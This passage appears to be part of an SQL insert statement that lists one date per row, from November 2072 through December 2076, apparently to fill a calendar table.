('2072-11-23'),
('2072-11-24'),
('2072-11-25'),
('2072-11-26'),
('2072-11-27'),
('2072-11-28'),
('2072-11-29'),
('2072-11-30'),
('2072-12-01'),
('2072-12-02'),
('2072-12-03'),
('2072-12-04'),
('2072-12-05'),
('2072-12-06'),
('2072-12-07'),
('2072-12-08'),
('2072-12-09'),
('2072-12-10'),
('2072-12-11'),
('2072-12-12'),
('2072-12-13'),
('2072-12-14'),
('2072-12-15'),
('2072-12-16'),
('2072-12-17'),
('2072-12-18'),
('2072-12-19'),
('2072-12-20'),
('2072-12-21'),
('2072-12-22'),
('2072-12-23'),
('2072-12-24'),
('2072-12-25'),
('2072-12-26'),
('2072-12-27'),
('2072-12-28'),
('2072-12-29'),
('2072-12-30'),
('2072-12-31'),
('2073-01-01'),
('2073-01-02'),
('2073-01-03'),
('2073-01-04'),
('2073-01-05'),
('2073-01-06'),
('2073-01-07'),
('2073-01-08'),
('2073-01-09'),
('2073-01-10'),
('2073-01-11'),
('2073-01-12'),
('2073-01-13'),
('2073-01-14'),
('2073-01-15'),
('2073-01-16'),
('2073-01-17'),
('2073-01-18'),
('2073-01-19'),
('2073-01-20'),
('2073-01-21'),
('2073-01-22'),
('2073-01-23'),
('2073-01-24'),
('2073-01-25'),
('2073-01-26'),
('2073-01-27'),
('2073-01-28'),
('2073-01-29'),
('2073-01-30'),
('2073-01-31'),
('2073-02-01'),
('2073-02-02'),
('2073-02-03'),
('2073-02-04'),
('2073-02-05'),
('2073-02-06'),
('2073-02-07'),
('2073-02-08'),
('2073-02-09'),
('2073-02-10'),
('2073-02-11'),
('2073-02-12'),
('2073-02-13'),
('2073-02-14'),
('2073-02-15'),
('2073-02-16'),
('2073-02-17'),
('2073-02-18'),
('2073-02-19'),
('2073-02-20'),
('2073-02-21'),
('2073-02-22'),
('2073-02-23'),
('2073-02-24'),
('2073-02-25'),
('2073-02-26'),
('2073-02-27'),
('2073-02-28'),
('2073-03-01'),
('2073-03-02'),
('2073-03-03'),
('2073-03-04'),
('2073-03-05'),
('2073-03-06'),
('2073-03-07'),
('2073-03-08'),
('2073-03-09'),
('2073-03-10'),
('2073-03-11'),
('2073-03-12'),
('2073-03-13'),
('2073-03-14'),
('2073-03-15'),
('2073-03-16'),
('2073-03-17'),
('2073-03-18'),
('2073-03-19'),
('2073-03-20'),
('2073-03-21'),
('2073-03-22'),
('2073-03-23'),
('2073-03-24'),
('2073-03-25'),
('2073-03-26'),
('2073-03-27'),
('2073-03-28'),
('2073-03-29'),
('2073-03-30'),
('2073-03-31'),
('2073-04-01'),
('2073-04-02'),
('2073-04-03'),
('2073-04-04'),
('2073-04-05'),
('2073-04-06'),
('2073-04-07'),
('2073-04-08'),
('2073-04-09'),
('2073-04-10'),
('2073-04-11'),
('2073-04-12'),
('2073-04-13'),
('2073-04-14'),
('2073-04-15'),
('2073-04-16'),
('2073-04-17'),
('2073-04-18'),
('2073-04-19'),
('2073-04-20'),
('2073-04-21'),
('2073-04-22'),
('2073-04-23'),
('2073-04-24'),
('2073-04-25'),
('2073-04-26'),
('2073-04-27'),
('2073-04-28'),
('2073-04-29'),
('2073-04-30'),
('2073-05-01'),
('2073-05-02'),
('2073-05-03'),
('2073-05-04'),
('2073-05-05'),
('2073-05-06'),
('2073-05-07'),
('2073-05-08'),
('2073-05-09'),
('2073-05-10'),
('2073-05-11'),
('2073-05-12'),
('2073-05-13'),
('2073-05-14'),
('2073-05-15'),
('2073-05-16'),
('2073-05-17'),
('2073-05-18'),
('2073-05-19'),
('2073-05-20'),
('2073-05-21'),
('2073-05-22'),
('2073-05-23'),
('2073-05-24'),
('2073-05-25'),
('2073-05-26'),
('2073-05-27'),
('2073-05-28'),
('2073-05-29'),
('2073-05-30'),
('2073-05-31'),
('2073-06-01'),
('2073-06-02'),
('2073-06-03'),
('2073-06-04'),
('2073-06-05'),
('2073-06-06'),
('2073-06-07'),
('2073-06-08'),
('2073-06-09'),
('2073-06-10'),
('2073-06-11'),
('2073-06-12'),
('2073-06-13'),
('2073-06-14'),
('2073-06-15'),
('2073-06-16'),
('2073-06-17'),
('2073-06-18'),
('2073-06-19'),
('2073-06-20'),
('2073-06-21'),
('2073-06-22'),
('2073-06-23'),
('2073-06-24'),
('2073-06-25'),
('2073-06-26'),
('2073-06-27'),
('2073-06-28'),
('2073-06-29'),
('2073-06-30'),
('2073-07-01'),
('2073-07-02'),
('2073-07-03'),
('2073-07-04'),
('2073-07-05'),
('2073-07-06'),
('2073-07-07'),
('2073-07-08'),
('2073-07-09'),
('2073-07-10'),
('2073-07-11'),
('2073-07-12'),
('2073-07-13'),
('2073-07-14'),
('2073-07-15'),
('2073-07-16'),
('2073-07-17'),
('2073-07-18'),
('2073-07-19'),
('2073-07-20'),
('2073-07-21'),
('2073-07-22'),
('2073-07-23'),
('2073-07-24'),
('2073-07-25'),
('2073-07-26'),
('2073-07-27'),
('2073-07-28'),
('2073-07-29'),
('2073-07-30'),
('2073-07-31'),
('2073-08-01'),
('2073-08-02'),
('2073-08-03'),
('2073-08-04'),
('2073-08-05'),
('2073-08-06'),
('2073-08-07'),
('2073-08-08'),
('2073-08-09'),
('2073-08-10'),
('2073-08-11'),
('2073-08-12'),
('2073-08-13'),
('2073-08-14'),
('2073-08-15'),
('2073-08-16'),
('2073-08-17'),
('2073-08-18'),
('2073-08-19'),
('2073-08-20'),
('2073-08-21'),
('2073-08-22'),
('2073-08-23'),
('2073-08-24'),
('2073-08-25'),
('2073-08-26'),
('2073-08-27'),
('2073-08-28'),
('2073-08-29'),
('2073-08-30'),
('2073-08-31'),
('2073-09-01'),
('2073-09-02'),
('2073-09-03'),
('2073-09-04'),
('2073-09-05'),
('2073-09-06'),
('2073-09-07'),
('2073-09-08'),
('2073-09-09'),
('2073-09-10'),
('2073-09-11'),
('2073-09-12'),
('2073-09-13'),
('2073-09-14'),
('2073-09-15'),
('2073-09-16'),
('2073-09-17'),
('2073-09-18'),
('2073-09-19'),
('2073-09-20'),
('2073-09-21'),
('2073-09-22'),
('2073-09-23'),
('2073-09-24'),
('2073-09-25'),
('2073-09-26'),
('2073-09-27'),
('2073-09-28'),
('2073-09-29'),
('2073-09-30'),
('2073-10-01'),
('2073-10-02'),
('2073-10-03'),
('2073-10-04'),
('2073-10-05'),
('2073-10-06'),
('2073-10-07'),
('2073-10-08'),
('2073-10-09'),
('2073-10-10'),
('2073-10-11'),
('2073-10-12'),
('2073-10-13'),
('2073-10-14'),
('2073-10-15'),
('2073-10-16'),
('2073-10-17'),
('2073-10-18'),
('2073-10-19'),
('2073-10-20'),
('2073-10-21'),
('2073-10-22'),
('2073-10-23'),
('2073-10-24'),
('2073-10-25'),
('2073-10-26'),
('2073-10-27'),
('2073-10-28'),
('2073-10-29'),
('2073-10-30'),
('2073-10-31'),
('2073-11-01'),
('2073-11-02'),
('2073-11-03'),
('2073-11-04'),
('2073-11-05'),
('2073-11-06'),
('2073-11-07'),
('2073-11-08'),
('2073-11-09'),
('2073-11-10'),
('2073-11-11'),
('2073-11-12'),
('2073-11-13'),
('2073-11-14'),
('2073-11-15'),
('2073-11-16'),
('2073-11-17'),
('2073-11-18'),
('2073-11-19'),
('2073-11-20'),
('2073-11-21'),
('2073-11-22'),
('2073-11-23'),
('2073-11-24'),
('2073-11-25'),
('2073-11-26'),
('2073-11-27'),
('2073-11-28'),
('2073-11-29'),
('2073-11-30'),
('2073-12-01'),
('2073-12-02'),
('2073-12-03'),
('2073-12-04'),
('2073-12-05'),
('2073-12-06'),
('2073-12-07'),
('2073-12-08'),
('2073-12-09'),
('2073-12-10'),
('2073-12-11'),
('2073-12-12'),
('2073-12-13'),
('2073-12-14'),
('2073-12-15'),
('2073-12-16'),
('2073-12-17'),
('2073-12-18'),
('2073-12-19'),
('2073-12-20'),
('2073-12-21'),
('2073-12-22'),
('2073-12-23'),
('2073-12-24'),
('2073-12-25'),
('2073-12-26'),
('2073-12-27'),
('2073-12-28'),
('2073-12-29'),
('2073-12-30'),
('2073-12-31'),
('2074-01-01'),
('2074-01-02'),
('2074-01-03'),
('2074-01-04'),
('2074-01-05'),
('2074-01-06'),
('2074-01-07'),
('2074-01-08'),
('2074-01-09'),
('2074-01-10'),
('2074-01-11'),
('2074-01-12'),
('2074-01-13'),
('2074-01-14'),
('2074-01-15'),
('2074-01-16'),
('2074-01-17'),
('2074-01-18'),
('2074-01-19'),
('2074-01-20'),
('2074-01-21'),
('2074-01-22'),
('2074-01-23'),
('2074-01-24'),
('2074-01-25'),
('2074-01-26'),
('2074-01-27'),
('2074-01-28'),
('2074-01-29'),
('2074-01-30'),
('2074-01-31'),
('2074-02-01'),
('2074-02-02'),
('2074-02-03'),
('2074-02-04'),
('2074-02-05'),
('2074-02-06'),
('2074-02-07'),
('2074-02-08'),
('2074-02-09'),
('2074-02-10'),
('2074-02-11'),
('2074-02-12'),
('2074-02-13'),
('2074-02-14'),
('2074-02-15'),
('2074-02-16'),
('2074-02-17'),
('2074-02-18'),
('2074-02-19'),
('2074-02-20'),
('2074-02-21'),
('2074-02-22'),
('2074-02-23'),
('2074-02-24'),
('2074-02-25'),
('2074-02-26'),
('2074-02-27'),
('2074-02-28'),
('2074-03-01'),
('2074-03-02'),
('2074-03-03'),
('2074-03-04'),
('2074-03-05'),
('2074-03-06'),
('2074-03-07'),
('2074-03-08'),
('2074-03-09'),
('2074-03-10'),
('2074-03-11'),
('2074-03-12'),
('2074-03-13'),
('2074-03-14'),
('2074-03-15'),
('2074-03-16'),
('2074-03-17'),
('2074-03-18'),
('2074-03-19'),
('2074-03-20'),
('2074-03-21'),
('2074-03-22'),
('2074-03-23'),
('2074-03-24'),
('2074-03-25'),
('2074-03-26'),
('2074-03-27'),
('2074-03-28'),
('2074-03-29'),
('2074-03-30'),
('2074-03-31'),
('2074-04-01'),
('2074-04-02'),
('2074-04-03'),
('2074-04-04'),
('2074-04-05'),
('2074-04-06'),
('2074-04-07'),
('2074-04-08'),
('2074-04-09'),
('2074-04-10'),
('2074-04-11'),
('2074-04-12'),
('2074-04-13'),
('2074-04-14'),
('2074-04-15'),
('2074-04-16'),
('2074-04-17'),
('2074-04-18'),
('2074-04-19'),
('2074-04-20'),
('2074-04-21'),
('2074-04-22'),
('2074-04-23'),
('2074-04-24'),
('2074-04-25'),
('2074-04-26'),
('2074-04-27'),
('2074-04-28'),
('2074-04-29'),
('2074-04-30'),
('2074-05-01'),
('2074-05-02'),
('2074-05-03'),
('2074-05-04'),
('2074-05-05'),
('2074-05-06'),
('2074-05-07'),
('2074-05-08'),
('2074-05-09'),
('2074-05-10'),
('2074-05-11'),
('2074-05-12'),
('2074-05-13'),
('2074-05-14'),
('2074-05-15'),
('2074-05-16'),
('2074-05-17'),
('2074-05-18'),
('2074-05-19'),
('2074-05-20'),
('2074-05-21'),
('2074-05-22'),
('2074-05-23'),
('2074-05-24'),
('2074-05-25'),
('2074-05-26'),
('2074-05-27'),
('2074-05-28'),
('2074-05-29'),
('2074-05-30'),
('2074-05-31'),
('2074-06-01'),
('2074-06-02'),
('2074-06-03'),
('2074-06-04'),
('2074-06-05'),
('2074-06-06'),
('2074-06-07'),
('2074-06-08'),
('2074-06-09'),
('2074-06-10'),
('2074-06-11'),
('2074-06-12'),
('2074-06-13'),
('2074-06-14'),
('2074-06-15'),
('2074-06-16'),
('2074-06-17'),
('2074-06-18'),
('2074-06-19'),
('2074-06-20'),
('2074-06-21'),
('2074-06-22'),
('2074-06-23'),
('2074-06-24'),
('2074-06-25'),
('2074-06-26'),
('2074-06-27'),
('2074-06-28'),
('2074-06-29'),
('2074-06-30'),
('2074-07-01'),
('2074-07-02'),
('2074-07-03'),
('2074-07-04'),
('2074-07-05'),
('2074-07-06'),
('2074-07-07'),
('2074-07-08'),
('2074-07-09'),
('2074-07-10'),
('2074-07-11'),
('2074-07-12'),
('2074-07-13'),
('2074-07-14'),
('2074-07-15'),
('2074-07-16'),
('2074-07-17'),
('2074-07-18'),
('2074-07-19'),
('2074-07-20'),
('2074-07-21'),
('2074-07-22'),
('2074-07-23'),
('2074-07-24'),
('2074-07-25'),
('2074-07-26'),
('2074-07-27'),
('2074-07-28'),
('2074-07-29'),
('2074-07-30'),
('2074-07-31'),
('2074-08-01'),
('2074-08-02'),
('2074-08-03'),
('2074-08-04'),
('2074-08-05'),
('2074-08-06'),
('2074-08-07'),
('2074-08-08'),
('2074-08-09'),
('2074-08-10'),
('2074-08-11'),
('2074-08-12'),
('2074-08-13'),
('2074-08-14'),
('2074-08-15'),
('2074-08-16'),
('2074-08-17'),
('2074-08-18'),
('2074-08-19'),
('2074-08-20'),
('2074-08-21'),
('2074-08-22'),
('2074-08-23'),
('2074-08-24'),
('2074-08-25'),
('2074-08-26'),
('2074-08-27'),
('2074-08-28'),
('2074-08-29'),
('2074-08-30'),
('2074-08-31'),
('2074-09-01'),
('2074-09-02'),
('2074-09-03'),
('2074-09-04'),
('2074-09-05'),
('2074-09-06'),
('2074-09-07'),
('2074-09-08'),
('2074-09-09'),
('2074-09-10'),
('2074-09-11'),
('2074-09-12'),
('2074-09-13'),
('2074-09-14'),
('2074-09-15'),
('2074-09-16'),
('2074-09-17'),
('2074-09-18'),
('2074-09-19'),
('2074-09-20'),
('2074-09-21'),
('2074-09-22'),
('2074-09-23'),
('2074-09-24'),
('2074-09-25'),
('2074-09-26'),
('2074-09-27'),
('2074-09-28'),
('2074-09-29'),
('2074-09-30'),
('2074-10-01'),
('2074-10-02'),
('2074-10-03'),
('2074-10-04'),
('2074-10-05'),
('2074-10-06'),
('2074-10-07'),
('2074-10-08'),
('2074-10-09'),
('2074-10-10'),
('2074-10-11'),
('2074-10-12'),
('2074-10-13'),
('2074-10-14'),
('2074-10-15'),
('2074-10-16'),
('2074-10-17'),
('2074-10-18'),
('2074-10-19'),
('2074-10-20'),
('2074-10-21'),
('2074-10-22'),
('2074-10-23'),
('2074-10-24'),
('2074-10-25'),
('2074-10-26'),
('2074-10-27'),
('2074-10-28'),
('2074-10-29'),
('2074-10-30'),
('2074-10-31'),
('2074-11-01'),
('2074-11-02'),
('2074-11-03'),
('2074-11-04'),
('2074-11-05'),
('2074-11-06'),
('2074-11-07'),
('2074-11-08'),
('2074-11-09'),
('2074-11-10'),
('2074-11-11'),
('2074-11-12'),
('2074-11-13'),
('2074-11-14'),
('2074-11-15'),
('2074-11-16'),
('2074-11-17'),
('2074-11-18'),
('2074-11-19'),
('2074-11-20'),
('2074-11-21'),
('2074-11-22'),
('2074-11-23'),
('2074-11-24'),
('2074-11-25'),
('2074-11-26'),
('2074-11-27'),
('2074-11-28'),
('2074-11-29'),
('2074-11-30'),
('2074-12-01'),
('2074-12-02'),
('2074-12-03'),
('2074-12-04'),
('2074-12-05'),
('2074-12-06'),
('2074-12-07'),
('2074-12-08'),
('2074-12-09'),
('2074-12-10'),
('2074-12-11'),
('2074-12-12'),
('2074-12-13'),
('2074-12-14'),
('2074-12-15'),
('2074-12-16'),
('2074-12-17'),
('2074-12-18'),
('2074-12-19'),
('2074-12-20'),
('2074-12-21'),
('2074-12-22'),
('2074-12-23'),
('2074-12-24'),
('2074-12-25'),
('2074-12-26'),
('2074-12-27'),
('2074-12-28'),
('2074-12-29'),
('2074-12-30'),
('2074-12-31'),
('2075-01-01'),
('2075-01-02'),
('2075-01-03'),
('2075-01-04'),
('2075-01-05'),
('2075-01-06'),
('2075-01-07'),
('2075-01-08'),
('2075-01-09'),
('2075-01-10'),
('2075-01-11'),
('2075-01-12'),
('2075-01-13'),
('2075-01-14'),
('2075-01-15'),
('2075-01-16'),
('2075-01-17'),
('2075-01-18'),
('2075-01-19'),
('2075-01-20'),
('2075-01-21'),
('2075-01-22'),
('2075-01-23'),
('2075-01-24'),
('2075-01-25'),
('2075-01-26'),
('2075-01-27'),
('2075-01-28'),
('2075-01-29'),
('2075-01-30'),
('2075-01-31'),
('2075-02-01'),
('2075-02-02'),
('2075-02-03'),
('2075-02-04'),
('2075-02-05'),
('2075-02-06'),
('2075-02-07'),
('2075-02-08'),
('2075-02-09'),
('2075-02-10'),
('2075-02-11'),
('2075-02-12'),
('2075-02-13'),
('2075-02-14'),
('2075-02-15'),
('2075-02-16'),
('2075-02-17'),
('2075-02-18'),
('2075-02-19'),
('2075-02-20'),
('2075-02-21'),
('2075-02-22'),
('2075-02-23'),
('2075-02-24'),
('2075-02-25'),
('2075-02-26'),
('2075-02-27'),
('2075-02-28'),
('2075-03-01'),
('2075-03-02'),
('2075-03-03'),
('2075-03-04'),
('2075-03-05'),
('2075-03-06'),
('2075-03-07'),
('2075-03-08'),
('2075-03-09'),
('2075-03-10'),
('2075-03-11'),
('2075-03-12'),
('2075-03-13'),
('2075-03-14'),
('2075-03-15'),
('2075-03-16'),
('2075-03-17'),
('2075-03-18'),
('2075-03-19'),
('2075-03-20'),
('2075-03-21'),
('2075-03-22'),
('2075-03-23'),
('2075-03-24'),
('2075-03-25'),
('2075-03-26'),
('2075-03-27'),
('2075-03-28'),
('2075-03-29'),
('2075-03-30'),
('2075-03-31'),
('2075-04-01'),
('2075-04-02'),
('2075-04-03'),
('2075-04-04'),
('2075-04-05'),
('2075-04-06'),
('2075-04-07'),
('2075-04-08'),
('2075-04-09'),
('2075-04-10'),
('2075-04-11'),
('2075-04-12'),
('2075-04-13'),
('2075-04-14'),
('2075-04-15'),
('2075-04-16'),
('2075-04-17'),
('2075-04-18'),
('2075-04-19'),
('2075-04-20'),
('2075-04-21'),
('2075-04-22'),
('2075-04-23'),
('2075-04-24'),
('2075-04-25'),
('2075-04-26'),
('2075-04-27'),
('2075-04-28'),
('2075-04-29'),
('2075-04-30'),
('2075-05-01'),
('2075-05-02'),
('2075-05-03'),
('2075-05-04'),
('2075-05-05'),
('2075-05-06'),
('2075-05-07'),
('2075-05-08'),
('2075-05-09'),
('2075-05-10'),
('2075-05-11'),
('2075-05-12'),
('2075-05-13'),
('2075-05-14'),
('2075-05-15'),
('2075-05-16'),
('2075-05-17'),
('2075-05-18'),
('2075-05-19'),
('2075-05-20'),
('2075-05-21'),
('2075-05-22'),
('2075-05-23'),
('2075-05-24'),
('2075-05-25'),
('2075-05-26'),
('2075-05-27'),
('2075-05-28'),
('2075-05-29'),
('2075-05-30'),
('2075-05-31'),
('2075-06-01'),
('2075-06-02'),
('2075-06-03'),
('2075-06-04'),
('2075-06-05'),
('2075-06-06'),
('2075-06-07'),
('2075-06-08'),
('2075-06-09'),
('2075-06-10'),
('2075-06-11'),
('2075-06-12'),
('2075-06-13'),
('2075-06-14'),
('2075-06-15'),
('2075-06-16'),
('2075-06-17'),
('2075-06-18'),
('2075-06-19'),
('2075-06-20'),
('2075-06-21'),
('2075-06-22'),
('2075-06-23'),
('2075-06-24'),
('2075-06-25'),
('2075-06-26'),
('2075-06-27'),
('2075-06-28'),
('2075-06-29'),
('2075-06-30'),
('2075-07-01'),
('2075-07-02'),
('2075-07-03'),
('2075-07-04'),
('2075-07-05'),
('2075-07-06'),
('2075-07-07'),
('2075-07-08'),
('2075-07-09'),
('2075-07-10'),
('2075-07-11'),
('2075-07-12'),
('2075-07-13'),
('2075-07-14'),
('2075-07-15'),
('2075-07-16'),
('2075-07-17'),
('2075-07-18'),
('2075-07-19'),
('2075-07-20'),
('2075-07-21'),
('2075-07-22'),
('2075-07-23'),
('2075-07-24'),
('2075-07-25'),
('2075-07-26'),
('2075-07-27'),
('2075-07-28'),
('2075-07-29'),
('2075-07-30'),
('2075-07-31'),
('2075-08-01'),
('2075-08-02'),
('2075-08-03'),
('2075-08-04'),
('2075-08-05'),
('2075-08-06'),
('2075-08-07'),
('2075-08-08'),
('2075-08-09'),
('2075-08-10'),
('2075-08-11'),
('2075-08-12'),
('2075-08-13'),
('2075-08-14'),
('2075-08-15'),
('2075-08-16'),
('2075-08-17'),
('2075-08-18'),
('2075-08-19'),
('2075-08-20'),
('2075-08-21'),
('2075-08-22'),
('2075-08-23'),
('2075-08-24'),
('2075-08-25'),
('2075-08-26'),
('2075-08-27'),
('2075-08-28'),
('2075-08-29'),
('2075-08-30'),
('2075-08-31'),
('2075-09-01'),
('2075-09-02'),
('2075-09-03'),
('2075-09-04'),
('2075-09-05'),
('2075-09-06'),
('2075-09-07'),
('2075-09-08'),
('2075-09-09'),
('2075-09-10'),
('2075-09-11'),
('2075-09-12'),
('2075-09-13'),
('2075-09-14'),
('2075-09-15'),
('2075-09-16'),
('2075-09-17'),
('2075-09-18'),
('2075-09-19'),
('2075-09-20'),
('2075-09-21'),
('2075-09-22'),
('2075-09-23'),
('2075-09-24'),
('2075-09-25'),
('2075-09-26'),
('2075-09-27'),
('2075-09-28'),
('2075-09-29'),
('2075-09-30'),
('2075-10-01'),
('2075-10-02'),
('2075-10-03'),
('2075-10-04'),
('2075-10-05'),
('2075-10-06'),
('2075-10-07'),
('2075-10-08'),
('2075-10-09'),
('2075-10-10'),
('2075-10-11'),
('2075-10-12'),
('2075-10-13'),
('2075-10-14'),
('2075-10-15'),
('2075-10-16'),
('2075-10-17'),
('2075-10-18'),
('2075-10-19'),
('2075-10-20'),
('2075-10-21'),
('2075-10-22'),
('2075-10-23'),
('2075-10-24'),
('2075-10-25'),
('2075-10-26'),
('2075-10-27'),
('2075-10-28'),
('2075-10-29'),
('2075-10-30'),
('2075-10-31'),
('2075-11-01'),
('2075-11-02'),
('2075-11-03'),
('2075-11-04'),
('2075-11-05'),
('2075-11-06'),
('2075-11-07'),
('2075-11-08'),
('2075-11-09'),
('2075-11-10'),
('2075-11-11'),
('2075-11-12'),
('2075-11-13'),
('2075-11-14'),
('2075-11-15'),
('2075-11-16'),
('2075-11-17'),
('2075-11-18'),
('2075-11-19'),
('2075-11-20'),
('2075-11-21'),
('2075-11-22'),
('2075-11-23'),
('2075-11-24'),
('2075-11-25'),
('2075-11-26'),
('2075-11-27'),
('2075-11-28'),
('2075-11-29'),
('2075-11-30'),
('2075-12-01'),
('2075-12-02'),
('2075-12-03'),
('2075-12-04'),
('2075-12-05'),
('2075-12-06'),
('2075-12-07'),
('2075-12-08'),
('2075-12-09'),
('2075-12-10'),
('2075-12-11'),
('2075-12-12'),
('2075-12-13'),
('2075-12-14'),
('2075-12-15'),
('2075-12-16'),
('2075-12-17'),
('2075-12-18'),
('2075-12-19'),
('2075-12-20'),
('2075-12-21'),
('2075-12-22'),
('2075-12-23'),
('2075-12-24'),
('2075-12-25'),
('2075-12-26'),
('2075-12-27'),
('2075-12-28'),
('2075-12-29'),
('2075-12-30'),
('2075-12-31'),
('2076-01-01'),
('2076-01-02'),
('2076-01-03'),
('2076-01-04'),
('2076-01-05'),
('2076-01-06'),
('2076-01-07'),
('2076-01-08'),
('2076-01-09'),
('2076-01-10'),
('2076-01-11'),
('2076-01-12'),
('2076-01-13'),
('2076-01-14'),
('2076-01-15'),
('2076-01-16'),
('2076-01-17'),
('2076-01-18'),
('2076-01-19'),
('2076-01-20'),
('2076-01-21'),
('2076-01-22'),
('2076-01-23'),
('2076-01-24'),
('2076-01-25'),
('2076-01-26'),
('2076-01-27'),
('2076-01-28'),
('2076-01-29'),
('2076-01-30'),
('2076-01-31'),
('2076-02-01'),
('2076-02-02'),
('2076-02-03'),
('2076-02-04'),
('2076-02-05'),
('2076-02-06'),
('2076-02-07'),
('2076-02-08'),
('2076-02-09'),
('2076-02-10'),
('2076-02-11'),
('2076-02-12'),
('2076-02-13'),
('2076-02-14'),
('2076-02-15'),
('2076-02-16'),
('2076-02-17'),
('2076-02-18'),
('2076-02-19'),
('2076-02-20'),
('2076-02-21'),
('2076-02-22'),
('2076-02-23'),
('2076-02-24'),
('2076-02-25'),
('2076-02-26'),
('2076-02-27'),
('2076-02-28'),
('2076-02-29'),
('2076-03-01'),
('2076-03-02'),
('2076-03-03'),
('2076-03-04'),
('2076-03-05'),
('2076-03-06'),
('2076-03-07'),
('2076-03-08'),
('2076-03-09'),
('2076-03-10'),
('2076-03-11'),
('2076-03-12'),
('2076-03-13'),
('2076-03-14'),
('2076-03-15'),
('2076-03-16'),
('2076-03-17'),
('2076-03-18'),
('2076-03-19'),
('2076-03-20'),
('2076-03-21'),
('2076-03-22'),
('2076-03-23'),
('2076-03-24'),
('2076-03-25'),
('2076-03-26'),
('2076-03-27'),
('2076-03-28'),
('2076-03-29'),
('2076-03-30'),
('2076-03-31'),
('2076-04-01'),
('2076-04-02'),
('2076-04-03'),
('2076-04-04'),
('2076-04-05'),
('2076-04-06'),
('2076-04-07'),
('2076-04-08'),
('2076-04-09'),
('2076-04-10'),
('2076-04-11'),
('2076-04-12'),
('2076-04-13'),
('2076-04-14'),
('2076-04-15'),
('2076-04-16'),
('2076-04-17'),
('2076-04-18'),
('2076-04-19'),
('2076-04-20'),
('2076-04-21'),
('2076-04-22'),
('2076-04-23'),
('2076-04-24'),
('2076-04-25'),
('2076-04-26'),
('2076-04-27'),
('2076-04-28'),
('2076-04-29'),
('2076-04-30'),
('2076-05-01'),
('2076-05-02'),
('2076-05-03'),
('2076-05-04'),
('2076-05-05'),
('2076-05-06'),
('2076-05-07'),
('2076-05-08'),
('2076-05-09'),
('2076-05-10'),
('2076-05-11'),
('2076-05-12'),
('2076-05-13'),
('2076-05-14'),
('2076-05-15'),
('2076-05-16'),
('2076-05-17'),
('2076-05-18'),
('2076-05-19'),
('2076-05-20'),
('2076-05-21'),
('2076-05-22'),
('2076-05-23'),
('2076-05-24'),
('2076-05-25'),
('2076-05-26'),
('2076-05-27'),
('2076-05-28'),
('2076-05-29'),
('2076-05-30'),
('2076-05-31'),
('2076-06-01'),
('2076-06-02'),
('2076-06-03'),
('2076-06-04'),
('2076-06-05'),
('2076-06-06'),
('2076-06-07'),
('2076-06-08'),
('2076-06-09'),
('2076-06-10'),
('2076-06-11'),
('2076-06-12'),
('2076-06-13'),
('2076-06-14'),
('2076-06-15'),
('2076-06-16'),
('2076-06-17'),
('2076-06-18'),
('2076-06-19'),
('2076-06-20'),
('2076-06-21'),
('2076-06-22'),
('2076-06-23'),
('2076-06-24'),
('2076-06-25'),
('2076-06-26'),
('2076-06-27'),
('2076-06-28'),
('2076-06-29'),
('2076-06-30'),
('2076-07-01'),
('2076-07-02'),
('2076-07-03'),
('2076-07-04'),
('2076-07-05'),
('2076-07-06'),
('2076-07-07'),
('2076-07-08'),
('2076-07-09'),
('2076-07-10'),
('2076-07-11'),
('2076-07-12'),
('2076-07-13'),
('2076-07-14'),
('2076-07-15'),
('2076-07-16'),
('2076-07-17'),
('2076-07-18'),
('2076-07-19'),
('2076-07-20'),
('2076-07-21'),
('2076-07-22'),
('2076-07-23'),
('2076-07-24'),
('2076-07-25'),
('2076-07-26'),
('2076-07-27'),
('2076-07-28'),
('2076-07-29'),
('2076-07-30'),
('2076-07-31'),
('2076-08-01'),
('2076-08-02'),
('2076-08-03'),
('2076-08-04'),
('2076-08-05'),
('2076-08-06'),
('2076-08-07'),
('2076-08-08'),
('2076-08-09'),
('2076-08-10'),
('2076-08-11'),
('2076-08-12'),
('2076-08-13'),
('2076-08-14'),
('2076-08-15'),
('2076-08-16'),
('2076-08-17'),
('2076-08-18'),
('2076-08-19'),
('2076-08-20'),
('2076-08-21'),
('2076-08-22'),
('2076-08-23'),
('2076-08-24'),
('2076-08-25'),
('2076-08-26'),
('2076-08-27'),
('2076-08-28'),
('2076-08-29'),
('2076-08-30'),
('2076-08-31'),
('2076-09-01'),
('2076-09-02'),
('2076-09-03'),
('2076-09-04'),
('2076-09-05'),
('2076-09-06'),
('2076-09-07'),
('2076-09-08'),
('2076-09-09'),
('2076-09-10'),
('2076-09-11'),
('2076-09-12'),
('2076-09-13'),
('2076-09-14'),
('2076-09-15'),
('2076-09-16'),
('2076-09-17'),
('2076-09-18'),
('2076-09-19'),
('2076-09-20'),
('2076-09-21'),
('2076-09-22'),
('2076-09-23'),
('2076-09-24'),
('2076-09-25'),
('2076-09-26'),
('2076-09-27'),
('2076-09-28'),
('2076-09-29'),
('2076-09-30'),
('2076-10-01'),
('2076-10-02'),
('2076-10-03'),
('2076-10-04'),
('2076-10-05'),
('2076-10-06'),
('2076-10-07'),
('2076-10-08'),
('2076-10-09'),
('2076-10-10'),
('2076-10-11'),
('2076-10-12'),
('2076-10-13'),
('2076-10-14'),
('2076-10-15'),
('2076-10-16'),
('2076-10-17'),
('2076-10-18'),
('2076-10-19'),
('2076-10-20'),
('2076-10-21'),
('2076-10-22'),
('2076-10-23'),
('2076-10-24'),
('2076-10-25'),
('2076-10-26'),
('2076-10-27'),
('2076-10-28'),
('2076-10-29'),
('2076-10-30'),
('2076-10-31'),
('2076-11-01'),
('2076-11-02'),
('2076-11-03'),
('2076-11-04'),
('2076-11-05'),
('2076-11-06'),
('2076-11-07'),
('2076-11-08'),
('2076-11-09'),
('2076-11-10'),
('2076-11-11'),
('2076-11-12'),
('2076-11-13'),
('2076-11-14'),
('2076-11-15'),
('2076-11-16'),
('2076-11-17'),
('2076-11-18'),
('2076-11-19'),
('2076-11-20'),
('2076-11-21'),
('2076-11-22'),
('2076-11-23'),
('2076-11-24'),
('2076-11-25'),
('2076-11-26'),
('2076-11-27'),
('2076-11-28'),
('2076-11-29'),
('2076-11-30'),
('2076-12-01'),
('2076-12-02'),
('2076-12-03'),
('2076-12-04'),
('2076-12-05'),
('2076-12-06'),
('2076-12-07'),
('2076-12-08'),
('2076-12-09'),
('2076-12-10'),
('2076-12-11'),
('2076-12-12'),
('2076-12-13'),
('2076-12-14'),
('2076-12-15'),
('2076-12-16'),
('2076-12-17'),
('2076-12-18'),
('2076-12-19'),
('2076-12-20'),
('2076-12-21'),
('2076-12-22'),
('2076-12-23'),
('2076-12-24'),
('2076-12-25'),
('2076-12-26'),
('2076-12-27'),
('2076-12-28'),
('2076-12-29'),
('2076-12-30'),
('2076-12-31'),
